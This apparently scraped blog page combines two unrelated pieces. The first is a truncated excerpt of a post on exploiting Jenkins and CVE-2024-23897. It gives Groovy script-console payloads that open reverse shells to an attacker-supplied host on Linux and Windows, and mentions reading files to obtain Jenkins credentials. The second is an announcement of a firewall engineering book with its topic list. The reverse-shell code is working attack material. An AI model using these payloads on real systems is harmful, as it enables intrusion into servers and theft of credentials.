Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...
Being a Firewall Engineer : An Operational Approach: A Comprehensive guide on firewall operations and best practices
Glad to announce the second edition of my book, Being a Firewall Engineer : An Operational Approach: A Comprehensive guide on firewall operations and best practices is now live on Amazon.
The firewall technologies and the landscape is rapidly changing and therefore i needed to make multiple changes from the first edition.This is not a configuration guide and is suitable for beginners and junior engineers.The following topics are briefly covered in the second edition of this book.
- Various Job roles related to Firewalls.
- What makes you a firewall expert?
- Know the major firewall vendors and their models.
- Firewall ranking and benchmarks.
- Understand the packet flow or order of operation.
- Understand the different types of firewalls.
- Daily tasks of a firewall administrator
- Guidelines on firewall hardening and compliance.
- Understand Change Management process.
- Illustration on How to make a firewall change (incorporating Change management process) with a real world example.